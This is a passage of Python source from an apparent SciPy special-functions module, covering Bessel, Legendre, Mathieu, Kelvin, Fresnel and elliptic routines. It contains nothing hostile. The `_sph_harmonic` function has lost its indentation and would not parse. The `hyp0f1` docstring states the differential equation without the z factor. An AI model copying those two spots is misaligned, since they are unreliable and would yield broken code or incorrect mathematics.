    # kf=2 selects Y1'; kc selects real-only (True) vs complex zeros.
    kf = 2
    kc = (complex != 1)
    return specfun.cyzo(nt, kf, kc)
def bessel_diff_formula(v, z, n, L, phase):
    """Evaluate the nth derivative of a Bessel-family function via the
    AMS55 difference formula.

    Parameters
    ----------
    v, z : order and argument forwarded to `L`.
    n : non-negative int
        Derivative order.
    L : callable ``L(v, z)``
        The underlying family: J, Y, H1, H2 (use phase = -1), or
        I, exp(v*pi*i)*K (use phase = 1).
    phase : int
        +1 or -1; selects the sign pattern of the recurrence.
        For K, the exp((v-k)*pi*i) factor can be pulled out by the caller.
    """
    p = 1.0
    s = L(v - n, z)
    # p tracks phase**i * choose(n, i) as the loop runs.
    # Fixed: use the builtin range instead of xrange from the removed
    # Python-2 compatibility shim scipy.lib.six (behavior identical).
    for i in range(1, n + 1):
        p = phase * (p * (n - i + 1)) / i
        s += p * L(v - n + i * 2, z)
    return s / (2.**n)
def jvp(v, z, n=1):
    """Return the nth derivative of Jv(z) with respect to z.

    n=0 returns Jv(z) itself.
    """
    if not isinstance(n, int) or (n < 0):
        raise ValueError("n must be a non-negative integer.")
    if n == 0:
        return jv(v, z)
    # AMS55 difference formula with phase -1 for the J family.
    return bessel_diff_formula(v, z, n, jv, -1)
def yvp(v, z, n=1):
    """Return the nth derivative of Yv(z) with respect to z.

    n=0 returns Yv(z) itself.
    """
    if not isinstance(n, int) or (n < 0):
        raise ValueError("n must be a non-negative integer.")
    if n == 0:
        return yv(v, z)
    # AMS55 difference formula with phase -1 for the Y family.
    return bessel_diff_formula(v, z, n, yv, -1)
def kvp(v, z, n=1):
    """Return the nth derivative of Kv(z) with respect to z.

    n=0 returns Kv(z) itself.
    """
    if not isinstance(n, int) or (n < 0):
        raise ValueError("n must be a non-negative integer.")
    if n == 0:
        return kv(v, z)
    # Phase +1 for the K family, with an extra (-1)**n sign.
    return (-1)**n * bessel_diff_formula(v, z, n, kv, 1)
def ivp(v, z, n=1):
    """Return the nth derivative of Iv(z) with respect to z.

    n=0 returns Iv(z) itself.
    """
    if not isinstance(n, int) or (n < 0):
        raise ValueError("n must be a non-negative integer.")
    if n == 0:
        return iv(v, z)
    # AMS55 difference formula with phase +1 for the I family.
    return bessel_diff_formula(v, z, n, iv, 1)
def h1vp(v, z, n=1):
    """Return the nth derivative of the Hankel function H1v(z) w.r.t. z.

    n=0 returns H1v(z) itself.
    """
    if not isinstance(n, int) or (n < 0):
        raise ValueError("n must be a non-negative integer.")
    if n == 0:
        return hankel1(v, z)
    # AMS55 difference formula with phase -1 for the H1 family.
    return bessel_diff_formula(v, z, n, hankel1, -1)
def h2vp(v, z, n=1):
    """Return the nth derivative of the Hankel function H2v(z) w.r.t. z.

    n=0 returns H2v(z) itself.
    """
    if not isinstance(n, int) or (n < 0):
        raise ValueError("n must be a non-negative integer.")
    if n == 0:
        return hankel2(v, z)
    # AMS55 difference formula with phase -1 for the H2 family.
    return bessel_diff_formula(v, z, n, hankel2, -1)
def sph_jn(n, z):
    """Compute the spherical Bessel function jn(z) and its derivative
    for all orders up to and including n.
    """
    if not (isscalar(n) and isscalar(z)):
        raise ValueError("arguments must be scalars.")
    if (n != floor(n)) or (n < 0):
        raise ValueError("n must be a non-negative integer.")
    # The Fortran routines need order >= 1; trim the output below.
    n1 = n if n >= 1 else 1
    if iscomplex(z):
        nm, jn, jnp, yn, ynp = specfun.csphjy(n1, z)
    else:
        nm, jn, jnp = specfun.sphj(n1, z)
    return jn[:(n+1)], jnp[:(n+1)]
def sph_yn(n, z):
    """Compute the spherical Bessel function yn(z) and its derivative
    for all orders up to and including n.
    """
    if not (isscalar(n) and isscalar(z)):
        raise ValueError("arguments must be scalars.")
    if (n != floor(n)) or (n < 0):
        raise ValueError("n must be a non-negative integer.")
    # The Fortran routines need order >= 1; trim the output below.
    n1 = n if n >= 1 else 1
    # Negative real arguments route through the complex code path.
    if iscomplex(z) or less(z, 0):
        nm, jn, jnp, yn, ynp = specfun.csphjy(n1, z)
    else:
        nm, yn, ynp = specfun.sphy(n1, z)
    return yn[:(n+1)], ynp[:(n+1)]
def sph_jnyn(n, z):
    """Compute the spherical Bessel functions jn(z) and yn(z) and their
    derivatives for all orders up to and including n.
    """
    if not (isscalar(n) and isscalar(z)):
        raise ValueError("arguments must be scalars.")
    if (n != floor(n)) or (n < 0):
        raise ValueError("n must be a non-negative integer.")
    # The Fortran routines need order >= 1; trim the output below.
    n1 = n if n >= 1 else 1
    if iscomplex(z) or less(z, 0):
        nm, jn, jnp, yn, ynp = specfun.csphjy(n1, z)
    else:
        nm, yn, ynp = specfun.sphy(n1, z)
        nm, jn, jnp = specfun.sphj(n1, z)
    return jn[:(n+1)], jnp[:(n+1)], yn[:(n+1)], ynp[:(n+1)]
def sph_in(n, z):
    """Compute the modified spherical Bessel function in(z) and its
    derivative for all orders up to and including n.
    """
    if not (isscalar(n) and isscalar(z)):
        raise ValueError("arguments must be scalars.")
    if (n != floor(n)) or (n < 0):
        raise ValueError("n must be a non-negative integer.")
    # The Fortran routines need order >= 1; trim the output below.
    n1 = n if n >= 1 else 1
    if iscomplex(z):
        nm, In, Inp, kn, knp = specfun.csphik(n1, z)
    else:
        nm, In, Inp = specfun.sphi(n1, z)
    return In[:(n+1)], Inp[:(n+1)]
def sph_kn(n, z):
    """Compute the modified spherical Bessel function kn(z) and its
    derivative for all orders up to and including n.
    """
    if not (isscalar(n) and isscalar(z)):
        raise ValueError("arguments must be scalars.")
    if (n != floor(n)) or (n < 0):
        raise ValueError("n must be a non-negative integer.")
    # The Fortran routines need order >= 1; trim the output below.
    n1 = n if n >= 1 else 1
    # Negative real arguments route through the complex code path.
    if iscomplex(z) or less(z, 0):
        nm, In, Inp, kn, knp = specfun.csphik(n1, z)
    else:
        nm, kn, knp = specfun.sphk(n1, z)
    return kn[:(n+1)], knp[:(n+1)]
def sph_inkn(n, z):
    """Compute the modified spherical Bessel functions in(z) and kn(z)
    and their derivatives for all orders up to and including n.
    """
    if not (isscalar(n) and isscalar(z)):
        raise ValueError("arguments must be scalars.")
    if (n != floor(n)) or (n < 0):
        raise ValueError("n must be a non-negative integer.")
    if iscomplex(z) or less(z, 0):
        nm, In, Inp, kn, knp = specfun.csphik(n, z)
    else:
        nm, In, Inp = specfun.sphi(n, z)
        nm, kn, knp = specfun.sphk(n, z)
    return In, Inp, kn, knp
def riccati_jn(n, x):
    """Compute the Ricatti-Bessel function of the first kind and its
    derivative for all orders up to and including n.
    """
    if not (isscalar(n) and isscalar(x)):
        raise ValueError("arguments must be scalars.")
    if (n != floor(n)) or (n < 0):
        raise ValueError("n must be a non-negative integer.")
    # The Fortran routine needs order >= 1; trim the output below.
    n1 = 1 if n == 0 else n
    nm, jn, jnp = specfun.rctj(n1, x)
    return jn[:(n+1)], jnp[:(n+1)]
def riccati_yn(n, x):
    """Compute the Ricatti-Bessel function of the second kind and its
    derivative for all orders up to and including n.
    """
    if not (isscalar(n) and isscalar(x)):
        raise ValueError("arguments must be scalars.")
    if (n != floor(n)) or (n < 0):
        raise ValueError("n must be a non-negative integer.")
    # The Fortran routine needs order >= 1; trim the output below.
    n1 = 1 if n == 0 else n
    nm, yn, ynp = specfun.rcty(n1, x)
    return yn[:(n+1)], ynp[:(n+1)]
def _sph_harmonic(m,n,theta,phi):
"""Compute spherical harmonics.
This is a ufunc and may take scalar or array arguments like any
other ufunc. The inputs will be broadcasted against each other.
Parameters
----------
m : int
|m| <= n; the order of the harmonic.
n : int
where `n` >= 0; the degree of the harmonic. This is often called
``l`` (lower case L) in descriptions of spherical harmonics.
theta : float
[0, 2*pi]; the azimuthal (longitudinal) coordinate.
phi : float
[0, pi]; the polar (colatitudinal) coordinate.
Returns
-------
y_mn : complex float
The harmonic $Y^m_n$ sampled at `theta` and `phi`
Notes
-----
There are different conventions for the meaning of input arguments
`theta` and `phi`. We take `theta` to be the azimuthal angle and
`phi` to be the polar angle. It is common to see the opposite
convention - that is `theta` as the polar angle and `phi` as the
azimuthal angle.
"""
x = cos(phi)
m,n = int(m), int(n)
Pmn,Pmn_deriv = lpmn(m,n,x)
# Legendre call generates all orders up to m and degrees up to n
val = Pmn[-1, -1]
val *= sqrt((2*n+1)/4.0/pi)
val *= exp(0.5*(gammaln(n-m+1)-gammaln(n+m+1)))
val *= exp(1j*m*theta)
return val
sph_harm = vectorize(_sph_harmonic,'D')
def erfinv(y):
    """Inverse of the error function: erf(erfinv(y)) == y for y in (-1, 1).

    Computed via the normal quantile: erfinv(y) = ndtri((y+1)/2)/sqrt(2).
    """
    quantile = (y + 1) / 2.0
    return ndtri(quantile) / sqrt(2)
def erfcinv(y):
    """Inverse of the complementary error function, erfc, for y in (0, 2).

    Computed via the normal quantile: erfcinv(y) = ndtri((2-y)/2)/sqrt(2).
    """
    quantile = (2 - y) / 2.0
    return ndtri(quantile) / sqrt(2)
def erf_zeros(nt):
    """Compute nt complex zeros of the error function erf(z)."""
    if (floor(nt) != nt) or (nt <= 0) or not isscalar(nt):
        raise ValueError("Argument must be positive scalar integer.")
    return specfun.cerzo(nt)
def fresnelc_zeros(nt):
    """Compute nt complex zeros of the cosine Fresnel integral C(z)."""
    if (floor(nt) != nt) or (nt <= 0) or not isscalar(nt):
        raise ValueError("Argument must be positive scalar integer.")
    # First argument 1 selects C(z) in the Fortran routine.
    return specfun.fcszo(1, nt)
def fresnels_zeros(nt):
    """Compute nt complex zeros of the sine Fresnel integral S(z)."""
    if (floor(nt) != nt) or (nt <= 0) or not isscalar(nt):
        raise ValueError("Argument must be positive scalar integer.")
    # First argument 2 selects S(z) in the Fortran routine.
    return specfun.fcszo(2, nt)
def fresnel_zeros(nt):
    """Compute nt complex zeros of both Fresnel integrals, S(z) and C(z)."""
    if (floor(nt) != nt) or (nt <= 0) or not isscalar(nt):
        raise ValueError("Argument must be positive scalar integer.")
    # (S zeros, C zeros) — codes 2 and 1 respectively.
    return specfun.fcszo(2, nt), specfun.fcszo(1, nt)
def hyp0f1(v, z):
    r"""Confluent hypergeometric limit function 0F1.

    Parameters
    ----------
    v, z : array_like
        Input values.

    Returns
    -------
    hyp0f1 : ndarray
        The confluent hypergeometric limit function.

    Notes
    -----
    This function is defined as:

    .. math:: _0F_1(v, z) = \sum_{k=0}^{\infty}\frac{z^k}{(v)_k k!}.

    It is the limit as q -> infinity of ``1F1(q; v; z/q)`` and satisfies
    the differential equation :math:`f''(z) + vf'(z) = f(z)`.
    """
    v, z = np.broadcast_arrays(atleast_1d(v), atleast_1d(z))
    arg = 2 * sqrt(abs(z))
    # z == 0 triggers 0/0 and inf warnings below; silence and patch after.
    old_err = np.seterr(all='ignore')
    # Bessel I for non-negative real part, Bessel J otherwise.
    num = where(z.real >= 0, iv(v - 1, arg), jv(v - 1, arg))
    den = abs(z) ** ((v - 1.0) / 2)
    num *= gamma(v)
    np.seterr(**old_err)
    # The limit at z == 0 is exactly 1.
    num[z == 0] = 1
    den[z == 0] = 1
    return num / den
def assoc_laguerre(x, n, k=0.0):
    """Evaluate the generalized (associated) Laguerre polynomial L_n^k(x)."""
    evaluate = orthogonal.eval_genlaguerre
    return evaluate(n, k, x)
digamma = psi
def polygamma(n, x):
    """Polygamma function: the nth derivative of the digamma (psi)
    function.

    Parameters
    ----------
    n : array_like of int
        The order of the derivative of `psi`.
    x : array_like
        Where to evaluate the polygamma function.

    Returns
    -------
    polygamma : ndarray
        The result.

    Examples
    --------
    >>> from scipy import special
    >>> x = [2, 3, 25.5]
    >>> special.polygamma(1, x)
    array([ 0.64493407,  0.39493407,  0.03999467])
    >>> special.polygamma(0, x) == special.psi(x)
    array([ True,  True,  True], dtype=bool)
    """
    n, x = asarray(n), asarray(x)
    # For n >= 1: psi^(n)(x) = (-1)**(n+1) * n! * zeta(n+1, x).
    higher = (-1.0)**(n+1) * gamma(n+1.0) * zeta(n+1, x)
    # n == 0 is simply the digamma function itself.
    return where(n == 0, psi(x), higher)
def mathieu_even_coef(m, q):
    """Compute expansion coefficients for even Mathieu functions and
    modified Mathieu functions.
    """
    if not (isscalar(m) and isscalar(q)):
        raise ValueError("m and q must be scalars.")
    if (q < 0):
        raise ValueError("q >=0")
    if (m != floor(m)) or (m < 0):
        raise ValueError("m must be an integer >=0.")
    # Empirical estimate of the number of significant coefficients.
    if (q <= 1):
        qm = 7.5 + 56.1*sqrt(q) - 134.7*q + 90.7*sqrt(q)*q
    else:
        qm = 17.0 + 3.1*sqrt(q) - .126*q + .0037*sqrt(q)*q
    km = int(qm + 0.5*m)
    if km > 251:
        print("Warning, too many predicted coefficients.")
    m = int(floor(m))
    # kd codes the parity class for the Fortran routine (even funcs).
    kd = 2 if m % 2 else 1
    a = mathieu_a(m, q)
    fc = specfun.fcoef(kd, m, q, a)
    return fc[:km]
def mathieu_odd_coef(m, q):
    """Compute expansion coefficients for odd Mathieu functions and
    modified Mathieu functions (uses the characteristic value b).
    """
    if not (isscalar(m) and isscalar(q)):
        raise ValueError("m and q must be scalars.")
    if (q < 0):
        raise ValueError("q >=0")
    if (m != floor(m)) or (m <= 0):
        raise ValueError("m must be an integer > 0")
    # Empirical estimate of the number of significant coefficients.
    if (q <= 1):
        qm = 7.5 + 56.1*sqrt(q) - 134.7*q + 90.7*sqrt(q)*q
    else:
        qm = 17.0 + 3.1*sqrt(q) - .126*q + .0037*sqrt(q)*q
    km = int(qm + 0.5*m)
    if km > 251:
        print("Warning, too many predicted coefficients.")
    m = int(floor(m))
    # kd codes the parity class for the Fortran routine (odd funcs).
    kd = 3 if m % 2 else 4
    b = mathieu_b(m, q)
    fc = specfun.fcoef(kd, m, q, b)
    return fc[:km]
def lpmn(m, n, z):
    """Associated Legendre function of the first kind, Pmn(z).

    Computes ``Pmn(z) = P_n^m(z)`` and its derivative ``Pmn'(z)`` for
    all orders ``0..m`` and degrees ``0..n``, returned as two
    ``(m+1, n+1)`` arrays.  Takes a real argument ``z``; use `clpmn`
    for complex arguments.

    Parameters
    ----------
    m : int
        ``|m| <= n``; the order of the Legendre function.
    n : int
        ``n >= 0``; the degree (often called ``l``).
    z : float
        Input value.

    Returns
    -------
    Pmn_z : (m+1, n+1) array
        Values for all orders 0..m and degrees 0..n.
    Pmn_d_z : (m+1, n+1) array
        Derivatives for all orders 0..m and degrees 0..n.

    See Also
    --------
    clpmn : associated Legendre functions of the first kind for complex z

    Notes
    -----
    In the interval (-1, 1), Ferrer's function of the first kind is
    returned.  The phase convention on (1, inf) and (-inf, -1) keeps
    the result real.

    References
    ----------
    .. [1] NIST Digital Library of Mathematical Functions
           http://dlmf.nist.gov/14.3
    """
    if not isscalar(m) or (abs(m) > n):
        raise ValueError("m must be <= n.")
    if not isscalar(n) or (n < 0):
        raise ValueError("n must be a non-negative integer.")
    if not isscalar(z):
        raise ValueError("z must be scalar.")
    if iscomplex(z):
        raise ValueError("Argument must be real. Use clpmn instead.")
    if (m < 0):
        # Negative order: evaluate at |m| and rescale afterwards.
        mp = -m
        mf, nf = mgrid[0:mp+1, 0:n+1]
        sv = errprint(0)  # silence warnings from gamma poles at mf > nf
        if abs(z) < 1:
            # Ferrer function; DLMF 14.9.3
            fixarr = where(mf > nf, 0.0,
                           (-1)**mf * gamma(nf-mf+1) / gamma(nf+mf+1))
        else:
            # Match to clpmn; DLMF 14.9.13
            fixarr = where(mf > nf, 0.0, gamma(nf-mf+1) / gamma(nf+mf+1))
        sv = errprint(sv)
    else:
        mp = m
    p, pd = specfun.lpmn(mp, n, z)
    if (m < 0):
        p = p * fixarr
        pd = pd * fixarr
    return p, pd
def clpmn(m, n, z):
    """Associated Legendre function of the first kind, Pmn(z), for
    complex arguments.

    Computes ``Pmn(z) = P_n^m(z)`` and its derivative ``Pmn'(z)`` for
    all orders ``0..m`` and degrees ``0..n``, returned as two
    ``(m+1, n+1)`` arrays.

    Parameters
    ----------
    m : int
        ``|m| <= n``; the order of the Legendre function.
    n : int
        ``n >= 0``; the degree (often called ``l``).
    z : float or complex
        Input value.

    Returns
    -------
    Pmn_z : (m+1, n+1) array
        Values for all orders 0..m and degrees 0..n.
    Pmn_d_z : (m+1, n+1) array
        Derivatives for all orders 0..m and degrees 0..n.

    See Also
    --------
    lpmn : associated Legendre functions of the first kind for real z

    Notes
    -----
    Phase conventions follow [1] so that the function is analytic.  The
    cut lies on the interval (-1, 1); approaching it from above or
    below in general yields a phase factor relative to Ferrer's
    function of the first kind (cf. `lpmn`).

    References
    ----------
    .. [1] NIST Digital Library of Mathematical Functions
           http://dlmf.nist.gov/14.21
    """
    if not isscalar(m) or (abs(m) > n):
        raise ValueError("m must be <= n.")
    if not isscalar(n) or (n < 0):
        raise ValueError("n must be a non-negative integer.")
    if not isscalar(z):
        raise ValueError("z must be scalar.")
    if (m < 0):
        # Negative order: evaluate at |m| and rescale afterwards.
        mp = -m
        mf, nf = mgrid[0:mp+1, 0:n+1]
        sv = errprint(0)  # silence warnings from gamma poles at mf > nf
        fixarr = where(mf > nf, 0.0, gamma(nf-mf+1) / gamma(nf+mf+1))
        sv = errprint(sv)
    else:
        mp = m
    p, pd = specfun.clpmn(mp, n, real(z), imag(z))
    if (m < 0):
        p = p * fixarr
        pd = pd * fixarr
    return p, pd
def lqmn(m, n, z):
    """Associated Legendre functions of the second kind, Qmn(z), and
    their derivatives ``Qmn'(z)``, for all orders ``0..m`` and degrees
    ``0..n``, as two ``(m+1, n+1)`` arrays.  z can be complex.
    """
    if not isscalar(m) or (m < 0):
        raise ValueError("m must be a non-negative integer.")
    if not isscalar(n) or (n < 0):
        raise ValueError("n must be a non-negative integer.")
    if not isscalar(z):
        raise ValueError("z must be scalar.")
    m = int(m)
    n = int(n)
    # The Fortran routines require m, n >= 1; trim the output back.
    mm = max(1, m)
    nn = max(1, n)
    if iscomplex(z):
        q, qd = specfun.clqmn(mm, nn, z)
    else:
        q, qd = specfun.lqmn(mm, nn, z)
    return q[:(m+1), :(n+1)], qd[:(m+1), :(n+1)]
def bernoulli(n):
    """Return an array of the Bernoulli numbers B0..Bn."""
    if not isscalar(n) or (n < 0):
        raise ValueError("n must be a non-negative integer.")
    n = int(n)
    # The Fortran routine needs at least 2; trim the output below.
    n1 = 2 if n < 2 else n
    return specfun.bernob(int(n1))[:(n+1)]
def euler(n):
    """Return an array of the Euler numbers E0..En (inclusive)."""
    if not isscalar(n) or (n < 0):
        raise ValueError("n must be a non-negative integer.")
    n = int(n)
    # The Fortran routine needs at least 2; trim the output below.
    n1 = 2 if n < 2 else n
    return specfun.eulerb(n1)[:(n+1)]
def lpn(n, z):
    """Compute the sequence of Legendre functions of the first kind
    (polynomials), Pn(z), and derivatives for all degrees 0..n.

    See also special.legendre for the polynomial class.
    """
    if not (isscalar(n) and isscalar(z)):
        raise ValueError("arguments must be scalars.")
    if (n != floor(n)) or (n < 0):
        raise ValueError("n must be a non-negative integer.")
    # The Fortran routines need degree >= 1; trim the output below.
    n1 = n if n >= 1 else 1
    if iscomplex(z):
        pn, pd = specfun.clpn(n1, z)
    else:
        pn, pd = specfun.lpn(n1, z)
    return pn[:(n+1)], pd[:(n+1)]
## lpni
def lqn(n,z):
    """Compute sequence of Legendre functions of the second kind,
    Qn(z) and derivatives for all degrees from 0 to n (inclusive).
    """
    if not (isscalar(n) and isscalar(z)):
        raise ValueError("arguments must be scalars.")
    if (n != floor(n)) or (n < 0):
        raise ValueError("n must be a non-negative integer.")
    # The Fortran routines need degree >= 1; slice back down afterwards.
    n1 = 1 if n < 1 else n
    routine = specfun.clqn if iscomplex(z) else specfun.lqnb
    qn, qd = routine(n1, z)
    return qn[:(n + 1)], qd[:(n + 1)]
def ai_zeros(nt):
    """Compute the zeros of Airy Functions Ai(x) and Ai'(x), a and a'
    respectively, and the associated values of Ai(a') and Ai'(a).

    Returns
    -------
    a[l-1]   -- the lth zero of Ai(x)
    ap[l-1]  -- the lth zero of Ai'(x)
    ai[l-1]  -- Ai(ap[l-1])
    aip[l-1] -- Ai'(a[l-1])
    """
    if not isscalar(nt) or (floor(nt) != nt) or (nt <= 0):
        raise ValueError("nt must be a positive integer scalar.")
    # kf=1 selects the Ai branch of the Fortran airyzo routine.
    return specfun.airyzo(nt, 1)
def bi_zeros(nt):
    """Compute the zeros of Airy Functions Bi(x) and Bi'(x), b and b'
    respectively, and the associated values of Bi(b') and Bi'(b).

    Returns
    -------
    b[l-1]   -- the lth zero of Bi(x)
    bp[l-1]  -- the lth zero of Bi'(x)
    bi[l-1]  -- Bi(bp[l-1])
    bip[l-1] -- Bi'(b[l-1])
    """
    if not isscalar(nt) or (floor(nt) != nt) or (nt <= 0):
        raise ValueError("nt must be a positive integer scalar.")
    # kf=2 selects the Bi branch of the Fortran airyzo routine.
    return specfun.airyzo(nt, 2)
def lmbda(v,x):
    """Compute sequence of lambda functions with arbitrary order v
    and their derivatives.  Lv0(x)..Lv(x) are computed with v0=v-int(v).

    Parameters
    ----------
    v : scalar
        Order of the final lambda function; must be non-negative.
    x : scalar
        Argument of the functions.

    Returns
    -------
    vl : array
        Values Lv0(x) .. Lv(x).
    dl : array
        Derivatives Lv0'(x) .. Lv'(x).

    Raises
    ------
    ValueError
        If the arguments are not scalars or v is negative.
    """
    if not (isscalar(v) and isscalar(x)):
        raise ValueError("arguments must be scalars.")
    if (v < 0):
        # FIX: guard accepts v == 0, but the old message claimed
        # "argument must be > 0."; the message now matches the condition.
        raise ValueError("v must be non-negative.")
    n = int(v)
    v0 = v - n
    # The Fortran routines need order >= 1; slice back down afterwards.
    if (n < 1):
        n1 = 1
    else:
        n1 = n
    v1 = n1 + v0
    # lamv handles fractional orders; lamn is the integer-order routine.
    if (v != floor(v)):
        vm, vl, dl = specfun.lamv(v1, x)
    else:
        vm, vl, dl = specfun.lamn(v1, x)
    return vl[:(n + 1)], dl[:(n + 1)]
def pbdv_seq(v,x):
    """Compute sequence of parabolic cylinder functions Dv(x) and
    their derivatives for Dv0(x)..Dv(x) with v0=v-int(v).
    """
    if not (isscalar(v) and isscalar(x)):
        raise ValueError("arguments must be scalars.")
    n = int(v)
    v0 = v - n
    # The Fortran routine needs an integer part of at least 1.
    n1 = max(n, 1)
    dv, dp, pdf, pdd = specfun.pbdv(v0 + n1, x)
    return dv[:n1 + 1], dp[:n1 + 1]
def pbvv_seq(v,x):
    """Compute sequence of parabolic cylinder functions Vv(x) and
    their derivatives for Vv0(x)..Vv(x) with v0=v-int(v).
    """
    # NOTE(review): the original docstring said "Dv(x)" (copy-paste from
    # pbdv_seq) although specfun.pbvv computes the second-kind Vv values.
    if not (isscalar(v) and isscalar(x)):
        raise ValueError("arguments must be scalars.")
    n = int(v)
    v0 = v - n
    # The Fortran routine needs an integer part of at least 1.
    n1 = max(n, 1)
    dv, dp, pdf, pdd = specfun.pbvv(v0 + n1, x)
    return dv[:n1 + 1], dp[:n1 + 1]
def pbdn_seq(n,z):
    """Compute sequence of parabolic cylinder functions Dn(z) and
    their derivatives for D0(z)..Dn(z).
    """
    if not (isscalar(n) and isscalar(z)):
        raise ValueError("arguments must be scalars.")
    if (floor(n) != n):
        raise ValueError("n must be an integer.")
    # The Fortran routine needs |order| > 1; otherwise work with 1.
    n1 = 1 if abs(n) <= 1 else n
    cpb, cpd = specfun.cpbdn(n1, z)
    return cpb[:n1 + 1], cpd[:n1 + 1]
def ber_zeros(nt):
    """Compute nt zeros of the Kelvin function ber x
    """
    # kd=1 selects ber in the Fortran klvnzo routine.
    if isscalar(nt) and (floor(nt) == nt) and (nt > 0):
        return specfun.klvnzo(nt, 1)
    raise ValueError("nt must be positive integer scalar.")
def bei_zeros(nt):
    """Compute nt zeros of the Kelvin function bei x
    """
    # kd=2 selects bei in the Fortran klvnzo routine.
    if isscalar(nt) and (floor(nt) == nt) and (nt > 0):
        return specfun.klvnzo(nt, 2)
    raise ValueError("nt must be positive integer scalar.")
def ker_zeros(nt):
    """Compute nt zeros of the Kelvin function ker x
    """
    # kd=3 selects ker in the Fortran klvnzo routine.
    if isscalar(nt) and (floor(nt) == nt) and (nt > 0):
        return specfun.klvnzo(nt, 3)
    raise ValueError("nt must be positive integer scalar.")
def kei_zeros(nt):
    """Compute nt zeros of the Kelvin function kei x
    """
    # kd=4 selects kei in the Fortran klvnzo routine.
    if isscalar(nt) and (floor(nt) == nt) and (nt > 0):
        return specfun.klvnzo(nt, 4)
    raise ValueError("nt must be positive integer scalar.")
def berp_zeros(nt):
    """Compute nt zeros of the Kelvin function ber' x
    """
    # kd=5 selects ber' in the Fortran klvnzo routine.
    if isscalar(nt) and (floor(nt) == nt) and (nt > 0):
        return specfun.klvnzo(nt, 5)
    raise ValueError("nt must be positive integer scalar.")
def beip_zeros(nt):
    """Compute nt zeros of the Kelvin function bei' x
    """
    # kd=6 selects bei' in the Fortran klvnzo routine.
    if isscalar(nt) and (floor(nt) == nt) and (nt > 0):
        return specfun.klvnzo(nt, 6)
    raise ValueError("nt must be positive integer scalar.")
def kerp_zeros(nt):
    """Compute nt zeros of the Kelvin function ker' x
    """
    # kd=7 selects ker' in the Fortran klvnzo routine.
    if isscalar(nt) and (floor(nt) == nt) and (nt > 0):
        return specfun.klvnzo(nt, 7)
    raise ValueError("nt must be positive integer scalar.")
def keip_zeros(nt):
    """Compute nt zeros of the Kelvin function kei' x
    """
    # kd=8 selects kei' in the Fortran klvnzo routine.
    if isscalar(nt) and (floor(nt) == nt) and (nt > 0):
        return specfun.klvnzo(nt, 8)
    raise ValueError("nt must be positive integer scalar.")
def kelvin_zeros(nt):
    """Compute nt zeros of all the Kelvin functions returned in a
    length 8 tuple of arrays of length nt.

    The tuple contains the arrays of zeros of
    (ber, bei, ker, kei, ber', bei', ker', kei')
    """
    if not isscalar(nt) or (floor(nt) != nt) or (nt <= 0):
        raise ValueError("nt must be positive integer scalar.")
    # kd = 1..8 walks ber, bei, ker, kei, ber', bei', ker', kei'.
    return tuple(specfun.klvnzo(nt, kd) for kd in range(1, 9))
def pro_cv_seq(m,n,c):
    """Compute a sequence of characteristic values for the prolate
    spheroidal wave functions for mode m and n'=m..n and spheroidal
    parameter c.
    """
    if not (isscalar(m) and isscalar(n) and isscalar(c)):
        raise ValueError("Arguments must be scalars.")
    if (n != floor(n)) or (m != floor(m)):
        raise ValueError("Modes must be integers.")
    if (n - m > 199):
        raise ValueError("Difference between n and m is too large.")
    num = n - m + 1
    # kd=1 selects the prolate case in specfun.segv; [1] is the array of
    # characteristic values.
    return specfun.segv(m, n, c, 1)[1][:num]
def obl_cv_seq(m,n,c):
    """Compute a sequence of characteristic values for the oblate
    spheroidal wave functions for mode m and n'=m..n and spheroidal
    parameter c.
    """
    if not (isscalar(m) and isscalar(n) and isscalar(c)):
        raise ValueError("Arguments must be scalars.")
    if (n != floor(n)) or (m != floor(m)):
        raise ValueError("Modes must be integers.")
    if (n - m > 199):
        raise ValueError("Difference between n and m is too large.")
    num = n - m + 1
    # kd=-1 selects the oblate case in specfun.segv; [1] is the array of
    # characteristic values.
    return specfun.segv(m, n, c, -1)[1][:num]
def ellipk(m):
    """
    Computes the complete elliptic integral of the first kind.

    This function is defined as

    .. math:: K(m) = \\int_0^{\\pi/2} [1 - m \\sin(t)^2]^{-1/2} dt

    Parameters
    ----------
    m : array_like
        The parameter of the elliptic integral.

    Returns
    -------
    K : array_like
        Value of the elliptic integral.

    Notes
    -----
    For more precision around point m = 1, use `ellipkm1`.
    """
    # Delegate to ellipkm1, which takes the complementary parameter 1-m.
    p = 1 - asarray(m)
    return ellipkm1(p)
def agm(a,b):
    """Arithmetic, Geometric Mean

    Start with a_0=a and b_0=b and iteratively compute

    a_{n+1} = (a_n+b_n)/2
    b_{n+1} = sqrt(a_n*b_n)

    until a_n=b_n.   The result is agm(a,b)

    agm(a,b)=agm(b,a)
    agm(a,a) = a
    min(a,b) < agm(a,b) < max(a,b)
    """
    # Closed form via the complete elliptic integral:
    # agm(a,b) = pi/4 * (a+b) / K(1 - 4ab/(a+b)^2), with ellipkm1 taking
    # the complementary parameter.  Adding 0.0 forces float arithmetic.
    total = a + b + 0.0
    return (pi / 4) * total / ellipkm1(4 * a * b / total ** 2)
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.